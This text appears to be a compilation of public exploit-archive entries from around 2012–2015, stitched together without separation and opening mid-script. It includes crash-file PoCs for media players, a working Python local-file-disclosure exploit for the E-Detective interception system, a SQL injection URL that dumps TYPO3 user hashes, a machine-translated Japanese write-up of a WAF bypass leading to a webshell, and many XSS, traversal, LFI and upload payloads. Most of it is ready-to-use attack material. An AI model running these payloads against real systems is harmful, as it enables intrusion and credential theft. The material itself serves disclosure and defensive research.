/get_extra_server.cgi\n"; print "Result: \n"; $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/extra_//g; $pwn=~ s/ //g; print $pwn; }

#!/usr/bin/python #[+] Author: SATHISH ARTHAR #[+] Exploit Title: XtMediaPlayer - 0.93 Memory Corruption PoC #[+] Date: 16-06-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://downloads.sourceforge.net/project/xtmediaplayer/XtMediaPlayer/XtMediaPlayer_0.93_Win.rar #[+] Sites: sathisharthars.wordpress.com #[+] Twitter: @sathisharthars #[+] Thanks: offensive security (@offsectraining) import os os.system("color 02") print"###########################################################" print"# Title: XtMediaPlayer - 0.93 Memory Corruption PoC #" print"# Author: SATHISH ARTHAR #" print"# Category: DoS/PoC # " print"###########################################################" crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "crash.wav" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" file.close()

#!/usr/bin/python #[+] Author: SATHISH ARTHAR #[+] Exploit Title: FinePlayer - 2.20 Memory Corruption PoC #[+] Date: 16-06-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://www.gitashare.com #[+] Download: http://www.gitashare.com/downloads/fineplayer220.zip #[+] Sites: sathisharthars.wordpress.com #[+] Twitter: @sathisharthars #[+] Thanks: offensive security (@offsectraining) import os os.system("color 02") print"###########################################################" print"# Title: FinePlayer - 2.20 Memory Corruption PoC #" print"# Author: SATHISH ARTHAR #" print"# Category: DoS/PoC # " print"###########################################################" crash=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") filename = "crash.mp4" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" file.close()

Advisory: SQL Injection in TYPO3 Extension Akronymmanager An SQL injection vulnerability in the TYPO3 extension "Akronymmanager" allows authenticated attackers to inject SQL statements and thereby read data from the TYPO3 database. Details ======= Product: sb_akronymmanager Affected Versions: <=0.5.0 Fixed Versions: 7.0.0 Vulnerability Type: SQL Injection Security Risk: medium Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002 Advisory Status: published CVE: CVE-2015-2803 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803 Introduction ============ "The Acronym Manager adds special explanatory markup to acronyms, abbreviations and foreign words on the whole site following the requirement to accessible web content. It provides a backend module to administer a list of words to generate new HTML elements for explanatory markup." (from the extension's documentation) More Details ============ Users with the respective privileges can maintain acronyms through the Akronymmanager extension pages in the TYPO3 backend web interface. In the extension's file mod1/index.php, an SQL query is generated like follows (line 357 and following): [...] $pageID = t3lib_div::_GET("id"); if ($pageID) $where = "uid='$pageID' AND "; $result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages', $where.'hidden="0" AND deleted="0"','sorting'); [...] The value of the user-supplied HTTP GET parametre 'id' is used without sanitizing it before its use in the subsequent SQL statement. Therefore, attackers are able to manipulate the resulting SQL statement and inject their own queries into the statement. Proof of Concept ================ When requesting the following URL, the vulnerability is exploited to yield all usernames and hashes from the TYPO3 be_users database: ------------------------------------------------------------------------ http://server/typo3conf/ext/sb_akronymmanager/mod1/index.php? id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password) %20FROM%20be_users),2%20--%20 ------------------------------------------------------------------------ The login credentials are then embedded in the HTML page that is returned: [...] <!-- Section header --> <h2>user1:$hash,user2:$hash[...]</h2> [...] Workaround ========== Only give trusted users access to the Akronymmanager extension in the TYPO3 backend. Fix === Upgrade the extension to version 7.0.0. Security Risk ============= An attacker who has access to the backend part of the Akronymmanager extension may send SQL queries to the database. This can be used to read arbitrary tables of the TYPO3 database and may ultimately result in a privilege escalation if the TYPO3 users' password hashes can be cracked efficiently. Depending on the database configuration, it might also be possible to execute arbitrary commands on the database host. As the attack requires an attacker who already has backend access, the vulnerability is estimated to pose only a medium risk. Timeline ======== 2015-02-25 Vulnerability identified 2015-03-04 Customer approved disclosure to vendor 2015-03-10 CVE number requested 2015-03-10 Vendor notified 2015-03-26 CVE number requested again 2015-03-31 CVE number assigned (request #2) 2015-03-31 Vendor notified again 2015-03-31 Vendor responded 2015-04-08 Vendor announced fixed version available at the end of April 2015-05-13 Requested update from vendor 2015-05-15 Vendor requests more time 2015-05-21 Requested update from vendor 2015-05-22 Vendor states that upload to extension registry doesn't work 2015-06-03 Requested update from vendor 2015-06-10 Vendor uploads new version to extension registry 2015-06-15 Advisory published RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

0x00序文 上記のタスクが与えられました。マップシステムを見たとき、私は混乱しました。この種のシステムは、通常、相互作用なしでBaiduマップのAPIを調整することであり、穴を掘ることは非常に困難です. 情報収集の波の後、メインサイトの関数がユニットのWeChat公式アカウントにジャンプできることがわかったため、アップロードポイントがあったため、この記事が見つかりました。 0x01ファズ アップロードポイントを使用して、ナンセンスについて話し、接尾辞を渡すことができるかどうかを確認しましょう。 最初に画像を渡し、接尾辞を変更してアップロードしてみてください それは直接なくなっています。ホワイトリストですか？自由にアップロードしてみてください アップロードできることがわかりました、多分wafが存在しますか？ コンテンツを1つの文に直接渡して、それが傍受されるかどうかを確認します 結果は傍受されず、コードが接尾辞でいくつかの操作を行ったはずです。 次はファズです。長い間、接尾辞名を渡すことができないことがわかりました。そのため、新しいラインメソッドのエラーを直接報告しました。 私は以前に犬を安全にして試してみた方法を取り出して、コンテンツディスポジション:フィールドを溢れました。 成功したことが判明しました. 0x02別の質問 トランスミッションはアップロードされましたが、完全なパスは返されず、伝送がどこにあるかわかりません。これの何が問題なのか 現在のディレクトリをスキャンすると、何も見つかりませんでした 次に、第1レベルのディレクトリをスキャンして、アップロードディレクトリがあることを発見しました。 スプライシングとけいれんを正常に試してみてください 0x03要約 1。ターゲットサイトの公式アカウントに添付ファイルのアップロードがあるため、ファイルアップロードの脆弱性2がある場合があります。2。ここでは、テストをテストします。AAA、コンテンツはこれがテストであり、アップロードできることを見つけてから、ターゲットサイトにWAFがあり、接尾辞名がインターセプトされていると推測します。次に、アップロードされたコンテンツはトロイの木馬であり、これを正常にアップロードできることをテストし、コンテンツは傍受されません。 3.コンテンツディスポジション:インターセプトフィールドを介して、WAFをバイパスしてファイル名をアップロードできますが、アップロードパスがそうであることはわかりません。Content-Disposition:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 5.最後に、Ice Scorpionを介してリンクに成功しました。出典：https://xz.aliyun.com/t/10366

Advisory: E-Detective Lawful Interception System multiple security vulnerabilities Date: 14/06/2015 CVE: unassigned Authors: Mustafa Al-Bassam (https://musalbas.com) slipstream/RoL (https://twitter.com/TheWack0lian) Software: Decision Group E-Detective Lawful Interception System Vendor URL: http://www.edecision4u.com/ Software description: "E-Detective is a real-time Internet interception, monitoring and forensics system that captures, decodes, and reconstructs various types of Internet traffic. It is commonly used for organization Internet behavioural monitoring, auditing, record keeping, forensics analysis, and investigation, as well as, legal and lawful interception for lawful enforcement agencies such as Police Intelligence, Military Intelligence, Cyber Security Departments, National Security Agencies, Criminal Investigation Agencies, Counter Terrorism Agencies etc." Vulnerabilities: 1) Unauthenticated Local File Disclosure ----- Proof-of-concept: https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py # Proof-of-concept for unauthenticated LFD in E-Detective. # Authors: Mustafa Al-Bassam (https://musalbas.com) # slipstream/RoL (https://twitter.com/TheWack0lian) import argparse import base64 import urllib2 def display_banner(): print """ _ | | _ ____ ___ __ ___ __| |______ | '_ \ \ /\ / / '_ \ / _ \/ _` |______| | |_) \ V V /| | | | __/ (_| | | .__/ \_/\_/ |_| |_|\___|\__,_| | | |_| _ _ _ _ | | | | | | (_) __| | ___| |_ ___ ___| |_ ___ _____ / _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\ | (_| | __/ || __/ (__| |_| |\ V / __/ \__,_|\___|\__\___|\___|\__|_| \_/ \___| """ argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.') argparser.add_argument('hostname', help='hostname to pwn') argparser.add_argument('file', help='path to file on server to grab') def encode(text): encoded = '' for i in range(len(text)): encoded += chr(ord(text[i]) + 40) encoded = base64.b64encode(encoded) return encoded def poc(hostname, file): return http_read('https://' + hostname + '/common/download.php?file=' + encode(file)) def http_read(url): return urllib2.urlopen(url).read() if __name__ == "__main__": display_banner() args = argparser.parse_args() print poc(args.hostname, args.file) ----- The /common/download.php in the web root allows for an unauthenticated user to read any file on the system that the web user has access to. This includes database credentials and any traffic intercepts captured by the system. The "file" parametre is "protected" by inadequate "cipher": base64 followed by rot40, which is trivially reversible. 2) Authenticated Remote Code Execution The restore feature in the "config backup" page extracts a .tar file encrypted with OpenSSL blowfish into the root directory (/) as root. The .tar file should be encrypted with the static key "/tmp/.charlie". Yes, that's the actual key - they pass the wrong argument to OpenSSL. They used -k instead of -kfile, thus the key is the path of the key file rather than the contents of the key file. This enables an attacker to upload a shell into the web root, or overwrite any system files such as /etc/shadow.

source: https://www.securityfocus.com/bid/53644/info Plogger Photo Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database. http://www.example.com/demo/plog-rss.php?id=1%27%22&level=collection

# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability # Date: 2015/06/16 # Vendor Homepage: http://blackcat-cms.org/ # Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip # Version: v1.1.1 # Tested on: Centos 6.5,PHP 5.4.41 # Category: webapps * Description file:/modules/blackcat/widgets/logs.php 72 // download 73 if(CAT_Helper_Validate::sanitizeGet('dl')) 74 { 75 $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl')); <-- Not Taint Checking 76 if(file_exists($file)) 77 { 78 $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip'); 79 $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME)) 80 ->create(array($file)); 81 if(!$zip->errorCode() == 0) 82 { 83 echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file") 84 . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file ); 85 } 86 else 87 { 88 $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip'; 89 header("Pragma: public"); // required 90 header("Expires: 0"); 91 header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); 92 header("Cache-Control: private",false); // required for certain browsers 93 header("Content-Type: application/zip"); 94 header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" ); 95 header("Content-Transfer-Encoding: binary"); 96 header("Content-Length: ".filesize($filename)); 97 readfile("$filename"); 98 exit; 99 } 100 } POC: curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -

source: https://www.securityfocus.com/bid/53646/info Mosh is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to crash or to enter an endless loop, denying service to legitimate users. echo -en "\e[2147483647L" echo -en "\e[2147483647M" echo -en "\e[2147483647@" echo -en "\e[2147483647P"

source: https://www.securityfocus.com/bid/53648/info phAlbum is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. phAlbum 1.5.1 is vulnerable; other versions may also be affected. http://www.example.com/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20//

source: https://www.securityfocus.com/bid/53655/info RuubikCMS is prone to multiple cross-site-scripting vulnerabilities, multiple information-disclosure vulnerabilities, and directory-traversal vulnerability. Attackers may leverage these issues to steal cookie-based authentication credentials, to execute arbitrary script code in the browser, and to retrieve arbitrary files from the affected system in the context of the affected site by using specially crafted request messages with directory-traversal sequences. This may allow the attacker to obtain sensitive information; other attacks are also possible. RuubikCMS 1.1.0 and 1.1.1 are vulnerable. cross-site-scripting: http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script> http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script> http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script> http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script> Information-disclosure: http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php http://www.example.com/learn/ruubikcms/extra/login/session.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/footer.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/head.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/multilang.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/required.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php http://www.example.com/learn/ruubikcms/ruubikcms/cms/login/form.php http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php http://www.example.com/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php http://www.example.com/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php Traversal vuln: ==============SNIP================== <?php // --- Image displayer with authentication // --- Sample call: image.php?f=imgfile.jpg // --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg require('../ruubikcms/includes/dbconfig.php'); $dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object require('../ruubikcms/includes/commonfunc.php'); define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1")); require('login/session.php'); // check if logged in if (!@$_SESSION['uid']) die("Access denied."); // images directory define('BASE_DIR','useruploads/images/'); // make sure program execution doesn't time out @set_time_limit(0); if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image."); if (strstr($_GET['f'], '../')) die('Error'); $fpath = BASE_DIR.$_GET['f']; if (!is_file($fpath)) die("File does not exist."); // file size in bytes // $fsize = filesize($fpath); // get mime type $mtype = ''; if (function_exists('mime_content_type')) { $mtype = mime_content_type($fpath); } elseif (function_exists('finfo_file')) { $finfo = finfo_open(FILEINFO_MIME); // return mime type $mtype = finfo_file($finfo, $fpath); finfo_close($finfo); } if ($mtype == '') { $mtype = "image/jpeg"; } header("Content-type: $mtype"); readfile($fpath); ?> =====================================

source: https://www.securityfocus.com/bid/53656/info phpCollab is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data. An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks. phpCollab 2.5 is vulnerable; other versions may also be affected. http://www.example.com/phpcollab/includes/phpmyadmin/tbl_dump.php POST DATA: table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B %5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=fil es&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_sele ct%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomment s&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B %5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phase s&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=r eports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select% 5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_ requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B% 5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server= 1&lang=en&db=phpcollab

source: https://www.securityfocus.com/bid/53662/info Pligg CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Pligg CMS 1.2.2 is vulnerable; other versions may also be affected. http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_1_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_low=%22%3E%3Cs cript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/module.php?module=captcha&action=configure&captcha=math&q_2_high=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53659/info Ajaxmint Gallery is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files and to execute local scripts in the context of the webserver process. This may aid in further attacks. Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected. http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell]

source: https://www.securityfocus.com/bid/53669/info PragmaMX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PragmaMX 1.12.1 is vulnerable; other versions may also be affected. http://www.example.com/modules.php?name=Themetest&%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53669/info PragmaMX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PragmaMX 1.12.1 is vulnerable; other versions may also be affected. http://www.example.com/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url=%22%3E%3Cscript%3E alert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53675/info phpCollab is prone to an unauthorized-access and an arbitrary-file-upload vulnerabilities. Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application. phpCollab 2.5 is vulnerable; other versions may also be affected. curl -i http://www.example.com/phpcollab/administration/phpinfo.php

source: https://www.securityfocus.com/bid/53675/info phpCollab is prone to an unauthorized-access and an arbitrary-file-upload vulnerabilities. Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application. phpCollab 2.5 is vulnerable; other versions may also be affected. POST /phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a3 8e51ed2&action=add&project=&task= HTTP/1.1 Host: 192.0.0.2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 DNT: 1 Proxy-Connection: keep-alive Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6 Referer: http://192.0.0.2/ Content-Type: multipart/form-data; boundary=---------------------------19548990971636807826563613512 Content-Length: 29914 -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000000 -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="maxCustom" -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="commentsField" Hello there -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="upload"; filename="filename.jpg" Content-Type: image/jpeg file data stripped -----------------------------19548990971636807826563613512 Content-Disposition: form-data; name="submit" Save -----------------------------19548990971636807826563613512--

source: https://www.securityfocus.com/bid/53692/info AzDGDatingMedium is prone to multiple remote vulnerabilities that includes a SQL-injection vulnerability, an information-disclosure vulnerability, a directory-traversal vulnerability and multiple cross-site scripting vulnerabilities, Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information. AzDGDatingMedium 1.9.3 is vulnerable; other versions may also be affected. http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php%00<script>alert(1);</script> http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default%00<script>alert("AkaStep");</script>&dir=../include/&f=config.inc.php http://www.example.com/learn/azdgscr/AzDGDatingMedium/admin/index.php?do=tedit&c_temp_edit=default&dir=../include/&f=config.inc.php